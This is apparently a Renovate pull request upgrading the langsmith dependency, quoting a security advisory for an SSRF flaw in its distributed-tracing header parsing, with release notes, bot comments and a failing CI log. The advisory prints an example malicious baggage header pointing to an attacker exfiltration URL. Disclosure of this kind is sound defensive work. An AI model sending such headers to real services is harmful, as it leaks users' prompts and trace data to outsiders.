Update dependency langsmith to v0.4.6 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
langsmith	0.3.73 → 0.4.6

---

LangSmith Client SDK Affected by Server-Side Request Forgery via Tracing Header Injection

CVE-2026-25528 / GHSA-v34v-rq6j-cj6p

More information

Details

Summary

The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary api_url values through the baggage header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.

---

Description

When using distributed tracing, the SDK parses incoming HTTP headers via RunTree.from_headers() in Python or RunTree.fromHeaders() in Typescript. The baggage header can contain replica configurations including api_url and api_key fields.

Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's post() and patch() methods send run data to all configured replica URLs, including any injected by an attacker.

---

Attack Vector

1. Attacker sends an HTTP request to a vulnerable service with a malicious baggage header:

   baggage: langsmith-replicas=[{"api_url":"https://attacker.com/exfil","project_name":"x"}]
   

2. The service parses the header via RunTree.from_headers(), storing the attacker's URL

3. When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to https://attacker.com/exfil

---

Impact

• Data Exfiltration: Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers
• SSRF: Ability to make the server send requests to arbitrary URLs, potentially targeting internal services

---

Affected Use Cases

Applications are vulnerable if they:

• Use TracingMiddleware to automatically propagate tracing context
• Call RunTree.from_headers() / RunTree.fromHeaders() with untrusted HTTP headers

---

Remediation

Update to the patched versions:

• Python: pip install langsmith>=0.6.3
• JavaScript: npm install langsmith@>=0.4.6

The fix filters incoming replica configurations to an allowlist of safe fields, removing api_url, api_key, and other credential fields.

---

Workarounds

If unable to upgrade immediately:

• Strip or validate the baggage header before passing to from_headers()
• Do not use TracingMiddleware with untrusted traffic

Severity

• CVSS Score: 5.8 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

References

• https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-v34v-rq6j-cj6p
• https://nvd.nist.gov/vuln/detail/CVE-2026-25528
• https://github.com/advisories/GHSA-v34v-rq6j-cj6p

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

langchain-ai/langsmith-sdk (langsmith)

v0.4.6

Compare Source

What's Changed

• If stream fails, fallback to buffered body request by @​angus-langchain in #​1845
• fix(js): Fix replica updates by @​jacoblee93 in #​1848
• feat(js): Support feedback attribution for OTEL evaluations by @​jacoblee93 in #​1847
• fix(js): Propagate microseconds added in dotted order conversion to run tree start time by @​jacoblee93 in #​1849
• fix(js): Respect project names set at runtime for OTEL exported traces by @​jacoblee93 in #​1850
• feat(python): Add repetitions support to pytest, rename in JS by @​jacoblee93 in #​1852

Full Changelog: langchain-ai/langsmith-sdk@v0.4.5...v0.4.6

v0.4.5

Compare Source

What's Changed

• feat(js): Add OTEL support by @​jacoblee93 in #​1814
• feat(js): Export passed AI SDK metadata as LangSmith metadata by @​jacoblee93 in #​1819
• Reduce zstd compression level to 1 by @​angus-langchain in #​1820
• feat(js): Add transform span method to exporter, allow setting run name by @​jacoblee93 in #​1821
• fix(js): Use context placeholder to preserve LangChain context variables even if tracing is disabled by @​jacoblee93 in #​1822
• fix(js): Fix types and add responses and completions.parse support for wrapOpenAI by @​jacoblee93 in #​1823
• release(js): 0.3.38 by @​jacoblee93 in #​1824
• fix(js): Fix AI SDK token counting issues for legacy exporter by @​jacoblee93 in #​1825
• feat(js): Make traced AI SDK runs respect provider metadata by @​jacoblee93 in #​1826
• feat(js): Add reference_example_id attribute to OTEL runs by @​jacoblee93 in #​1836
• [open-swe] fix: improve serialization of Maps and complex objects in traces by @​open-swe[bot] in #​1835
• release(js): 0.3.41 by @​jacoblee93 in #​1837
• fix(js): Add endpoint shim to example upload by @​jacoblee93 in #​1839
• Add runs endpoints env to replicas by @​hinthornw in #​1830
• release(js): 0.3.42 by @​jacoblee93 in #​1842
• feat(python): Populate example metadata in pytest, prefix experiment runs with ls_example by @​jacoblee93 in #​1840

New Contributors

• @​open-swe[bot] made their first contribution in #​1835

Full Changelog: langchain-ai/langsmith-sdk@v0.4.4...v0.4.5

v0.4.4

Compare Source

What's Changed

• Add replicas to baggage header by @​angus-langchain in #​1817

Full Changelog: langchain-ai/langsmith-sdk@v0.4.3...v0.4.4

v0.4.3

Compare Source

What's Changed

• feat(js): Allow suppressing circular JSON warnings by @​jacoblee93 in #​1815
• fix(py): loosen pydantic dep by @​baskaryan in #​1816

Full Changelog: langchain-ai/langsmith-sdk@v0.4.2...v0.4.3

v0.4.2

Compare Source

What's Changed

• Add agent instructions for Python SDK by @​nfcampos in #​1776
• Fix some issues w running codex in this repo by @​nfcampos in #​1777
• Fix race for cached client initialization by @​nfcampos in #​1778
• Handle missing attachment files gracefully by @​nfcampos in #​1782
• fix(js): Fix JSDom check for Node 22 by @​jacoblee93 in #​1784
• Cache request settings for Client by @​nfcampos in #​1787
• chore: auto-label issues with 'sdk' label by @​madams0013 in #​1791
• Store only the first new_token event by @​nfcampos in #​1779
• fix(js): Pass events through on run create by @​jacoblee93 in #​1794
• fix(js): Avoid overwriting runtime if already set by @​jacoblee93 in #​1795
• feat(js): Add replica support for JS by @​jacoblee93 in #​1796
• release(js): 0.3.32 by @​jacoblee93 in #​1797
• add util for getting project name from env var by @​lc-arjun in #​1801
• patch[python]: Only set replica updates on patch by @​angus-langchain in #​1798
• feat[python]: Trace to multiple projects with distributed tracing by @​angus-langchain in #​1804
• feat[python]: Enable OpenTelemetry trace context propagation by @​angus-langchain in #​1805
• chore(deps): bump protobuf from 5.29.4 to 5.29.5 in /python by @​dependabot in #​1807
• feat(py): add evaluate(..., error_handling="ignore") by @​baskaryan in #​1774

New Contributors

• @​lc-arjun made their first contribution in #​1801

Full Changelog: langchain-ai/langsmith-sdk@v0.4.1...v0.4.2

v0.4.1

Compare Source

What's Changed

• fix: hybrid mode has subtle shut down race conditoin by @​EugeneJinXin in #​1775

Full Changelog: langchain-ai/langsmith-sdk@v0.4.0...v0.4.1

v0.4.0

What's Changed

• feat: OTEL_ENABLED mode sends to both otel and ls, while allowing otel only through OTEL_ONLY var by @​EugeneJinXin in #​1762

New Contributors

• @​EugeneJinXin made their first contribution in #​1762

Full Changelog: langchain-ai/langsmith-sdk@v0.3.45...v0.4.0

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[vercel]

The latest updates on your projects. Learn more about Vercel for GitHub.

Project	Deployment	Actions	Updated (UTC)
liam-app	Ready	Preview, Comment	Apr 29, 2026 7:07pm
liam-assets	Ready	Preview, Comment	Apr 29, 2026 7:07pm
liam-docs	Ready	Preview, Comment	Apr 29, 2026 7:07pm
liam-erd-sample	Ready	Preview, Comment	Apr 29, 2026 7:07pm
liam-storybook	Ready	Preview, Comment	Apr 29, 2026 7:07pm

[giselles-ai]

Finished running flow.

Step 1
🟢	On Pull Request Opened Status: Success Updated: Feb 15, 2026 11:14am
Step 2
🟢	gpt-5 Status: Success Updated: Feb 15, 2026 11:15am
Step 3
🟢	Create Pull Request Comment Status: Success Updated: Feb 15, 2026 11:15am

[giselles-ai]

Check changeset necessity

Status: NOT REQUIRED

Reason:

• The only affected packages are internal: @liam-hq/agent and @liam-hq/schema-bench, both listed in the ignored packages.
• No changes to target, user-facing packages (@liam-hq/cli, @liam-hq/erd-core, @liam-hq/schema, @liam-hq/ui).
• The PR updates a third-party dependency (langsmith) and lockfiles/config only; no public API or behavior change in target packages.
• This is a security/maintenance dependency bump within ignored/internal packages, which does not require a release.

Changeset (copy & paste):

<!-- No changeset required for this PR -->

[devin-ai-integration]

✅ Devin Review: No Issues Found

Devin Review analyzed this PR and found no potential bugs to report.

View in Devin Review to see 3 additional findings.

[github-actions]

🤖 Agent Deep Modeling Execution

Started at: 2026-04-29 19:08:38 UTC

View Details

Command Output

@liam-hq/agent@0.1.0 execute-deep-modeling /home/runner/work/liam/liam/frontend/internal-packages/agent
pnpm test:integration src/createGraph.integration.test.ts

@liam-hq/agent@0.1.0 test:integration /home/runner/work/liam/liam/frontend/internal-packages/agent
vitest --watch=false --passWithNoTests --config vitest.config.integration.ts src/createGraph.integration.test.ts

RUN v3.2.4 /home/runner/work/liam/liam/frontend/internal-packages/agent

(node:8040) ExperimentalWarning: WASI is an experimental feature and might change at any time
(Use node --trace-warnings ... to show where the warning was created)

✅ [INFO] 2026-04-29T19:08:41.031Z
LangSmith Trace URL: https://smith.langchain.com/o/eed4d2d8-0bd8-4ca4-a452-4da88ef63fd6/projects/p/9324fe51-27a4-4604-a52b-c6cc240f6dcc?searchModel=%7B%22filter%22%3A%22and(eq(is_root%2C%20true)%2C%20and(eq(metadata_key%2C%20%5C%22thread_id%5C%22)%2C%20eq(metadata_value%2C%20%5C%225d24bf70-bd47-4645-af2a-fdc451b65cef%5C%22)))%22%7D
stderr | src/createGraph.integration.test.ts > createGraph Integration > should execute complete workflow
Failed to Failed to send multipart request. Received status [403]: Forbidden. Message:

Context: trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=51b62667-aa6e-4274-ac41-c807dad2518f; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=09c5ec6b-844f-4a24-afa5-8d162abd98b8; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=71faadfb-f77f-4cb9-b017-1a6de42f1e76; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=26b85d32-6871-4a01-887f-a8d76b2600f3; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=58c16d5b-5b93-400a-9dbf-95ed47785093; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=9e4bd579-4bd0-428e-88aa-767b07f91101; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=5fcb3e8c-3733-4df9-b150-994b0020bd64; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=7297409e-be5e-4173-8bd1-861b2dc5707e; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=438df7a1-7bf2-4666-affb-14df045b94c0; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=99a94011-c48f-467c-b5e4-43a13318734d; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=5bca6881-71ea-42e1-9118-21a208005003; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=17c6ce16-6116-41b6-a2f8-d82ac4340f33; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=868d831f-17d3-46ce-ab57-74f5b35f9806; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=d8b2ef8b-b38a-4724-8846-e161528fd9e6; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=3e211ad1-0db9-4bc1-9f25-edf1954af9c5; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=4fa7026f-3c6e-47e2-972b-60ae6bdb367c; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=ef514a5a-430b-4824-8e60-27babf71f360; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=886487c5-4515-4a67-92c8-5b74cc19b3e3; trace=3c5530ca-a037-46cb-a3a2-3d7d752cc2c2,id=29840f12-1403-4e5e-a13a-c0f37109b05e

x

⎯⎯⎯⎯⎯⎯⎯ Failed Tests 1 ⎯⎯⎯⎯⎯⎯⎯

FAIL src/createGraph.integration.test.ts > createGraph Integration > should execute complete workflow
WorkflowTerminationError: Error in analyzeRequirementsNode: 401 Incorrect API key provided: sk-proj-********************************************************************************************************************************************************N7kA. You can find your API key at https://platform.openai.com/account/api-keys.

Troubleshooting URL: https://js.langchain.com/docs/troubleshooting/errors/MODEL_AUTHENTICATION/

❯ RunnableCallable.analyzeRequirementsNode [as func] src/pm-agent/nodes/analyzeRequirementsNode.ts:38:11
36|
37| if (analysisResult.isErr()) {
38| throw new WorkflowTerminationError(
| ^
39| analysisResult.error,
40| 'analyzeRequirementsNode',
❯ RunnableCallable.invoke ../../../node_modules/.pnpm/@langchain+langgraph@0.4.9_@langchain+core@0.3.78_@opentelemetry+api@1.9.0_@opentelemet_cd940287faf0db93d41d5fc1f29067cc/node_modules/@langchain/langgraph/src/utils.ts:85:21
❯ RunnableSequence.invoke ../../../node_modules/.pnpm/@langchain+core@0.3.78_@opentelemetry+api@1.9.0_@opentelemetry+sdk-trace-base@2.2.0_@op_0a8880fa2f45d0308ed941fc53f9c9f1/node_modules/@langchain/core/dist/runnables/base.js:1308:33
❯ runWithRetry ../../../node_modules/.pnpm/@langchain+langgraph@0.4.9@langchain+core@0.3.78_@opentelemetry+api@1.9.0_@opentelemet_cd940287faf0db93d41d5fc1f29067cc/node_modules/@langchain/langgraph/src/pregel/retry.ts:103:16
❯ PregelRunner.executeTasksWithRetry ../../../node_modules/.pnpm/@langchain+langgraph@0.4.9@langchain+core@0.3.78_@opentelemetry+api@1.9.0_@opentelemet_cd940287faf0db93d41d5fc1f29067cc/node_modules/@langchain/langgraph/src/pregel/runner.ts:330:27
❯ PregelRunner.tick ../../../node_modules/.pnpm/@langchain+langgraph@0.4.9_@langchain+core@0.3.78_@opentelemetry+api@1.9.0_@opentelemet_cd940287faf0db93d41d5fc1f29067cc/node_modules/@langchain/langgraph/src/pregel/runner.ts:138:50
❯ CompiledStateGraph.runLoop ../../../node_modules/.pnpm/@langchain+langgraph@0.4.9@langchain+core@0.3.78_@opentelemetry+api@1.9.0_@opentelemet_cd940287faf0db93d41d5fc1f29067cc/node_modules/@langchain/langgraph/src/pregel/index.ts:2233:9
❯ createAndRunLoop ../../../node_modules/.pnpm/@langchain+langgraph@0.4.9_@langchain+core@0.3.78_@opentelemetry+api@1.9.0_@opentelemet_cd940287faf0db93d41d5fc1f29067cc/node_modules/@langchain/langgraph/src/pregel/index.ts:2092:9

⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯[1/1]⎯

Test Files 1 failed (1)
Tests 1 failed (1)
Start at 19:08:39
Duration 2.46s (transform 486ms, setup 0ms, collect 1.51s, tests 673ms, environment 0ms, prepare 85ms)

 ELIFECYCLE  Command failed with exit code 1.
/home/runner/work/liam/liam/frontend/internal-packages/agent:
 ERR_PNPM_RECURSIVE_RUN_FIRST_FAIL  @liam-hq/agent@0.1.0 execute-deep-modeling: pnpm test:integration src/createGraph.integration.test.ts
Exit status 1